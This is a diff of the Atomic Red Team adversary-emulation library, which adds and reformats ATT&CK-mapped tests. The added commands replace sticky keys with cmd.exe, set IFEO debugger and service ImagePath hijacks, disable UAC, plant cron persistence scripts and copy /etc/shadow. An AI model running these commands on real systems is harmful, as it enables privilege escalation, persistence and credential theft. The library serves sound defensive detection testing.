'sc.exe delete #{weak_service_name} + +' + name: command_prompt T1548.001: technique: external_references: @@ -8465,14 +8585,23 @@ persistence: type: Path default: C:\windows\system32\cmd.exe executor: - command: "$input_table = \"#{parent_list}\".split(\",\")\n$Name = \"Debugger\"\n$Value - = \"#{attached_process}\"\nForeach ($item in $input_table){ \n $item - = $item.trim()\n $registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows - NT\\CurrentVersion\\Image File Execution Options\\$item\"\n IF(!(Test-Path - $registryPath))\n {\n New-Item -Path $registryPath -Force\n New-ItemProperty - -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force\n - \ }\n ELSE\n {\n New-ItemProperty -Path $registryPath -Name $name -Value - $Value\n }\n}\n" + command: | + $input_table = "#{parent_list}".split(",") + $Name = "Debugger" + $Value = "#{attached_process}" + Foreach ($item in $input_table){ + $item = $item.trim() + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + } cleanup_command: | $input_table = "#{parent_list}".split(",") Foreach ($item in $input_table) @@ -8482,6 +8611,24 @@ persistence: } name: powershell elevation_required: true + - name: Replace binary of sticky keys + auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 + description: 'Replace sticky keys binary (sethc.exe) with cmd.exe + +' + supported_platforms: + - windows + executor: + command: | + copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe + takeown /F C:\Windows\System32\sethc.exe /A + icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t + copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe + cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe + +' + name: command_prompt + elevation_required: true T1098: technique: object_marking_refs: @@ -10772,11 +10919,12 @@ persistence: cleanup_command: 'crontab /tmp/notevil ' - - name: Cron - Add script to cron folder + - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 - description: 'This test adds a script to a cron folder configured to execute - on a schedule. This technique was used by the threat actor Rocke during the - exploitation of Linux web servers. + description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, + /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a + schedule. This technique was used by the threat actor Rocke during the exploitation + of Linux web servers. ' supported_platforms: @@ -10794,10 +10942,41 @@ persistence: executor: elevation_required: true name: bash - command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name} + command: | + echo "#{command}" > /etc/cron.daily/#{cron_script_name} + echo "#{command}" > /etc/cron.hourly/#{cron_script_name} + echo "#{command}" > /etc/cron.monthly/#{cron_script_name} + echo "#{command}" > /etc/cron.weekly/#{cron_script_name} + cleanup_command: | + rm /etc/cron.daily/#{cron_script_name} + rm /etc/cron.hourly/#{cron_script_name} + rm /etc/cron.monthly/#{cron_script_name} + rm /etc/cron.weekly/#{cron_script_name} + - name: Cron - Add script to /var/spool/cron/crontabs/ folder + auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 + description: 'This test adds a script to a /var/spool/cron/crontabs folder configured + to execute on a schedule. This technique was used by the threat actor Rocke + during the exploitation of Linux web servers. ' - cleanup_command: 'rm /etc/cron.daily/#{cron_script_name} + supported_platforms: + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in /var/spool/cron/crontabs folder + type: string + default: persistevil + executor: + elevation_required: true + name: bash + command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} + +' + cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} ' T1574.001: @@ -11579,7 +11758,51 @@ persistence: - Daniel Oakley - Travis Smith, Tripwire x_mitre_version: '2.1' - atomic_tests: [] + identifier: T1133 + atomic_tests: + - name: Running Chrome VPN Extensions via the Registry 2 vpn extension + auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4 + description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, + please see "T1133\src\list of vpn extension.txt" to view complete list + +' + supported_platforms: + - windows + input_arguments: + chrome_url: + description: chrome installer download URL + type: url + default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe + extension_id: + description: chrome extension id + type: String + default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" + +' + dependency_executor_name: powershell + dependencies: + - description: 'chrome must be installed + +' + prereq_command: if (cmd /c "chrome 2>nul") {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url} + Start-Process $env:temp\ChromeStandaloneSetup64.exe /S + executor: + name: powershell + elevation_required: true + command: | + $extList = #{extension_id} + foreach ($extension in $extList) { + New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force + New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force} + Start-Process -FilePath "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" + Start-Sleep -Seconds 30 + Stop-Process -Name "chrome" + cleanup_command: |- + $extList = #{extension_id} + foreach ($extension in $extList) { + Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore} T1574: technique: external_references: @@ -15405,9 +15628,9 @@ persistence: atomic_tests: - name: Service Registry Permissions Weakness auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a - description: "Service registry permissions weakness check and then which can - lead to privilege escalation with ImagePath. eg. \nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\" - /v ImagePath /d \"C:\\temp\\AtomicRedteam.exe\"\n" + description: | + Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. + reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" supported_platforms: - windows input_arguments: @@ -15420,6 +15643,48 @@ persistence: get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL name: powershell + - name: Service ImagePath Change with reg.exe + auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 + description: 'Change Service registry ImagePath of a bengin service to a malicious + file + +' + supported_platforms: + - windows + input_arguments: + weak_service_name: + description: weak service name + type: String + default: calcservice + weak_service_path: + description: weak service path + type: String + default: "%windir%\\system32\\win32calc.exe" + malicious_service_path: + description: malicious service path + type: String + default: "%windir%\\system32\\cmd.exe" + dependency_executor_name: powershell + dependencies: + - description: 'The service must exist (#{weak_service_name}) + +' + prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit + 1} + +' + get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" + +' + executor: + command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" + /f /v ImagePath /d "#{malicious_service_path}" + +' + cleanup_command: 'sc.exe delete #{weak_service_name} + +' + name: command_prompt T1547.009: technique: external_references: @@ -16777,7 +17042,45 @@ credential-access: x_mitre_is_subtechnique: true x_mitre_platforms: - Linux - atomic_tests: [] + identifier: T1003.008 + atomic_tests: + - name: Access /etc/shadow (Local) + auto_generated_guid: 3723ab77-c546-403c-8fb4-bb577033b235 + description: "/etc/shadow file is accessed in Linux environments\n" + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: "/tmp/T1003.008.txt" + executor: + command: | + sudo cat /etc/shadow > #{output_file} + cat #{output_file} + cleanup_command: 'rm -f #{output_file} + +' + name: bash + elevation_required: true + - name: Access /etc/passwd (Local) + auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d + description: "/etc/passwd file is accessed in Linux environments\n" + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: "/tmp/T1003.008.txt" + executor: + command: | + cat /etc/passwd > #{output_file} + cat #{output_file} + cleanup_command: 'rm -f #{output_file} + +' + name: sh T1552.003: technique: external_references: @@ -22120,10 +22423,11 @@ defense-evasion: elevation_required: true - name: Bypass UAC using sdclt DelegateExecute auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7 - description: "Bypasses User Account Control using a fileless method, registry - only. \nUpon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\n[Reference - - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\nAdapted - from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\n" + description: | + Bypasses User Account Control using a fileless method, registry only. + Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe + [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) + Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) supported_platforms: - windows input_arguments: @@ -22142,6 +22446,24 @@ defense-evasion: ' name: powershell + - name: Disable UAC using reg.exe + auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 + description: | + Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key + HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 + supported_platforms: + - windows + executor: + command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System + /v EnableLUA /t REG_DWORD /d 0 /f + +' + cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System + /v EnableLUA /t REG_DWORD /d 1 /f + +' + name: command_prompt + elevation_required: true T1218.003: technique: external_references: @@ -33757,9 +34079,9 @@ defense-evasion: atomic_tests: - name: Service Registry Permissions Weakness auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a - description: "Service registry permissions weakness check and then which can - lead to privilege escalation with ImagePath. eg. \nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\" - /v ImagePath /d \"C:\\temp\\AtomicRedteam.exe\"\n" + description: | + Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. + reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" supported_platforms: - windows input_arguments: @@ -33772,6 +34094,48 @@ defense-evasion: get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL name: powershell + - name: Service ImagePath Change with reg.exe + auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 + description: 'Change Service registry ImagePath of a bengin service to a malicious + file + +' + supported_platforms: + - windows + input_arguments: + weak_service_name: + description: weak service name + type: String + default: calcservice + weak_service_path: + description: weak service path + type: String + default: "%windir%\\system32\\win32calc.exe" + malicious_service_path: + description: malicious service path + type: String + default: "%windir%\\system32\\cmd.exe" + dependency_executor_name: powershell + dependencies: + - description: 'The service must exist (#{weak_service_name}) + +' + prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit + 1} + +' + get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" + +' + executor: + command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" + /f /v ImagePath /d "#{malicious_service_path}" + +' + cleanup_command: 'sc.exe delete #{weak_service_name} + +' + name: command_prompt T1548.001: technique: external_references: @@ -34092,7 +34456,7 @@ defense-evasion: executor: name: command_prompt elevation_required: false - command: '#{microsoft_wordpath}\protocolhandler.exe "ms-word:nft|u|#{remote_url}" + command: '"#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}" ' T1216: @@ -36216,6 +36580,40 @@ defense-evasion: ' name: command_prompt + - name: attrib - hide file + auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c + description: | + Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folder as hidden by using specific flags so that + the victim does not see the file. + supported_platforms: + - windows + input_arguments: + file_or_folder: + description: Path of the file or folder remove attribute. + type: path + default: "%temp%\\T1222.001_attrib_2" + dependency_executor_name: command_prompt + dependencies: + - description: 'Test requires a file to modify to be located at (#{file_or_folder}) + +' + prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) + +' + get_prereq_command: | + mkdir #{file_or_folder} + echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt + echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt + executor: + command: | + attrib.exe +h #{file_or_folder}\T1222.001_attrib1.txt + attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt + cleanup_command: | + attrib.exe -h #{file_or_folder}\T1222.001_attrib1.txt + attrib.exe -h #{file_or_folder}\T1222.001_attrib2.txt + del #{file_or_folder}\T1222.001_attrib*.txt + rmdir #{file_or_folder} + name: command_prompt - name: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 description: Invokes the command line used by Ryuk Ransomware to grant full @@ -39327,6 +39725,7 @@ discovery: net localgroup net group /domain net group "domain admins" /domain + net group "enterprise admins" /domain name: command_prompt - name: Permission Groups Discovery PowerShell (Domain) auto_generated_guid: 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 @@ -42107,6 +42506,19 @@ discovery: executor: command: "#{adfind_path} -f (objectcategory=subnet)\n" name: command_prompt + - name: Qakbot Recon + auto_generated_guid: 121de5c6-5818-4868-b8a7-8fd07c455c1b + description: A list of commands known to be performed by Qakbot for recon purposes + supported_platforms: + - windows + input_arguments: + recon_commands: + description: File that houses list of commands to be executed + type: Path + default: PathToAtomicsFolder\T1016\src\qakbot.bat + executor: + command: "#{recon_commands}\n" + name: command_prompt T1049: technique: object_marking_refs: @@ -43241,11 +43653,12 @@ execution: cleanup_command: 'crontab /tmp/notevil ' - - name: Cron - Add script to cron folder + - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 - description: 'This test adds a script to a cron folder configured to execute - on a schedule. This technique was used by the threat actor Rocke during the - exploitation of Linux web servers. + description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, + /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a + schedule. This technique was used by the threat actor Rocke during the exploitation + of Linux web servers. ' supported_platforms: @@ -43263,10 +43676,41 @@ execution: executor: elevation_required: true name: bash - command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name} + command: | + echo "#{command}" > /etc/cron.daily/#{cron_script_name} + echo "#{command}" > /etc/cron.hourly/#{cron_script_name} + echo "#{command}" > /etc/cron.monthly/#{cron_script_name} + echo "#{command}" > /etc/cron.weekly/#{cron_script_name} + cleanup_command: | + rm /etc/cron.daily/#{cron_script_name} + rm /etc/cron.hourly/#{cron_script_name} + rm /etc/cron.monthly/#{cron_script_name} + rm /etc/cron.weekly/#{cron_script_name} + - name: Cron - Add script to /var/spool/cron/crontabs/ folder + auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 + description: 'This test adds a script to a /var/spool/cron/crontabs folder configured + to execute on a schedule. This technique was used by the threat actor Rocke + during the exploitation of Linux web servers. ' - cleanup_command: 'rm /etc/cron.daily/#{cron_script_name} + supported_platforms: + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in /var/spool/cron/crontabs folder + type: string + default: persistevil + executor: + elevation_required: true + name: bash + command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} + +' + cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} ' T1559.002: @@ -54456,7 +54900,51 @@ initial-access: - Daniel Oakley - Travis Smith, Tripwire x_mitre_version: '2.1' - atomic_tests: [] + identifier: T1133 + atomic_tests: + - name: Running Chrome VPN Extensions via the Registry 2 vpn extension + auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4 + description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, + please see "T1133\src\list of vpn extension.txt" to view complete list + +' + supported_platforms: + - windows + input_arguments: + chrome_url: + description: chrome installer download URL + type: url + default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe + extension_id: + description: chrome extension id + type: String + default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" + +' + dependency_executor_name: powershell + dependencies: + - description: 'chrome must be installed + +' + prereq_command: if (cmd /c "chrome 2>nul") {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url} + Start-Process $env:temp\ChromeStandaloneSetup64.exe /S + executor: + name: powershell + elevation_required: true + command: | + $extList = #{extension_id} + foreach ($extension in $extList) { + New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force + New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force} + Start-Process -FilePath "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" + Start-Sleep -Seconds 30 + Stop-Process -Name "chrome" + cleanup_command: |- + $extList = #{extension_id} + foreach ($extension in $extList) { + Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore} T1200: technique: id: attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9 diff --git a/atomics/T1003.008/T1003.008.md b/atomics/T1003.008/T1003.008.md index c5d38f78..52491f16 100644 --- a/atomics/T1003.008/T1003.008.md +++ b/atomics/T1003.008/T1003.008.md @@ -1,5 +1,5 @@ # T1003.008 - /etc/passwd and /etc/shadow -## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003/008) +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/008)
Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats) The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db @@ -9,6 +9,8 @@ The Linux utility, unshadow, can be used to combine the two files in a format su - [Atomic Test #1 - Access /etc/shadow (Local)](#atomic-test-1---access-etcshadow-local) +- [Atomic Test #2 - Access /etc/passwd (Local)](#atomic-test-2---access-etcpasswd-local) +
@@ -21,12 +23,12 @@ The Linux utility, unshadow, can be used to combine the two files in a format su #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt| -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) ```bash @@ -55,12 +57,12 @@ rm -f #{output_file} #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt| -#### Attack Commands: Run with `sh`! +#### Attack Commands: Run with `sh`! ```sh diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md index 5438e0a3..617951b6 100644 --- a/atomics/T1016/T1016.md +++ b/atomics/T1016/T1016.md @@ -18,6 +18,8 @@ Adversaries may use the information from [System Network Configuration Discovery - [Atomic Test #6 - Adfind - Enumerate Active Directory Subnet Objects](#atomic-test-6---adfind---enumerate-active-directory-subnet-objects) +- [Atomic Test #7 - Qakbot Recon](#atomic-test-7---qakbot-recon) +
@@ -250,4 +252,33 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste +
+
+ +## Atomic Test #7 - Qakbot Recon +A list of commands known to be performed by Qakbot for recon purposes + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| recon_commands | File that houses list of commands to be executed | Path | PathToAtomicsFolder\T1016\src\qakbot.bat| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +#{recon_commands} +``` + + + + + +
diff --git a/atomics/T1016/T1016.yaml b/atomics/T1016/T1016.yaml index e6522970..18d8f663 100644 --- a/atomics/T1016/T1016.yaml +++ b/atomics/T1016/T1016.yaml @@ -148,6 +148,7 @@ atomic_tests: name: command_prompt - name: Qakbot Recon + auto_generated_guid: 121de5c6-5818-4868-b8a7-8fd07c455c1b description: A list of commands known to be performed by Qakbot for recon purposes supported_platforms: - windows diff --git a/atomics/T1053.003/T1053.003.md b/atomics/T1053.003/T1053.003.md index b0fe3386..7cda336c 100644 --- a/atomics/T1053.003/T1053.003.md +++ b/atomics/T1053.003/T1053.003.md @@ -8,7 +8,9 @@ An adversary may use cron in Linux or Unix environments to execute - [Atomic Test #1 - Cron - Replace crontab with referenced file](#atomic-test-1---cron---replace-crontab-with-referenced-file) -- [Atomic Test #2 - Cron - Add script to cron folder](#atomic-test-2---cron---add-script-to-cron-folder) +- [Atomic Test #2 - Cron - Add script to all cron subfolders](#atomic-test-2---cron---add-script-to-all-cron-subfolders) + +- [Atomic Test #3 - Cron - Add script to /var/spool/cron/crontabs/ folder](#atomic-test-3---cron---add-script-to-varspoolcroncrontabs-folder)
@@ -48,8 +50,8 @@ crontab /tmp/notevil

-## Atomic Test #2 - Cron - Add script to cron folder -This test adds a script to a cron folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. +## Atomic Test #2 - Cron - Add script to all cron subfolders +This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. **Supported Platforms:** macOS, Linux @@ -68,11 +70,51 @@ This test adds a script to a cron folder configured to execute on a schedule. Th ```bash echo "#{command}" > /etc/cron.daily/#{cron_script_name} +echo "#{command}" > /etc/cron.hourly/#{cron_script_name} +echo "#{command}" > /etc/cron.monthly/#{cron_script_name} +echo "#{command}" > /etc/cron.weekly/#{cron_script_name} ``` #### Cleanup Commands: ```bash rm /etc/cron.daily/#{cron_script_name} +rm /etc/cron.hourly/#{cron_script_name} +rm /etc/cron.monthly/#{cron_script_name} +rm /etc/cron.weekly/#{cron_script_name} +``` + + + + + +
+
+ +## Atomic Test #3 - Cron - Add script to /var/spool/cron/crontabs/ folder +This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log| +| cron_script_name | Name of file to store in /var/spool/cron/crontabs folder | string | persistevil| + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} +``` + +#### Cleanup Commands: +```bash +rm /var/spool/cron/crontabs/#{cron_script_name} ``` diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md index 632eccd0..0a6d22dc 100644 --- a/atomics/T1069.002/T1069.002.md +++ b/atomics/T1069.002/T1069.002.md @@ -42,6 +42,7 @@ information will be displayed. net localgroup net group /domain net group "domain admins" /domain +net group "enterprise admins" /domain ``` diff --git a/atomics/T1133/T1133.md b/atomics/T1133/T1133.md new file mode 100644 index 00000000..346e3930 --- /dev/null +++ b/atomics/T1133/T1133.md @@ -0,0 +1,66 @@ +# T1133 - External Remote Services +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1133) +
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally. + +Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.
+ +## Atomic Tests + +- [Atomic Test #1 - Running Chrome VPN Extensions via the Registry 2 vpn extension](#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension) + + +
+ +## Atomic Test #1 - Running Chrome VPN Extensions via the Registry 2 vpn extension +Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| chrome_url | chrome installer download URL | url | https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe| +| extension_id | chrome extension id | String | "fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +$extList = #{extension_id} +foreach ($extension in $extList) { + New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force + New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force} +Start-Process -FilePath "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" +Start-Sleep -Seconds 30 +Stop-Process -Name "chrome" +``` + +#### Cleanup Commands: +```powershell +$extList = #{extension_id} +foreach ($extension in $extList) { +Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore} +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: chrome must be installed +##### Check Prereq Commands: +```powershell +if (cmd /c "chrome 2>nul") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url} +Start-Process $env:temp\ChromeStandaloneSetup64.exe /S +``` + + + + +
diff --git a/atomics/T1133/T1133.yaml b/atomics/T1133/T1133.yaml index aa5b5012..f6019a08 100644 --- a/atomics/T1133/T1133.yaml +++ b/atomics/T1133/T1133.yaml @@ -4,6 +4,7 @@ display_name: External Remote Services atomic_tests: - name: Running Chrome VPN Extensions via the Registry 2 vpn extension + auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4 description: | Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md index f04f0d2b..256f8447 100644 --- a/atomics/T1218/T1218.md +++ b/atomics/T1218/T1218.md @@ -194,7 +194,7 @@ Emulates attack via documents through protocol handler in Microsoft Office. On ```cmd -#{microsoft_wordpath}\protocolhandler.exe "ms-word:nft|u|#{remote_url}" +"#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}" ``` diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md index 1ddc2d51..4dbeacfc 100644 --- a/atomics/T1222.001/T1222.001.md +++ b/atomics/T1222.001/T1222.001.md @@ -14,7 +14,9 @@ Adversaries can interact with the DACLs using built-in Windows commands, such as - [Atomic Test #3 - attrib - Remove read-only attribute](#atomic-test-3---attrib---remove-read-only-attribute) -- [Atomic Test #4 - Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style](#atomic-test-4---grant-full-access-to-entire-c-drive-for-everyone---ryuk-ransomware-style) +- [Atomic Test #4 - attrib - hide file](#atomic-test-4---attrib---hide-file) + +- [Atomic Test #5 - Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware 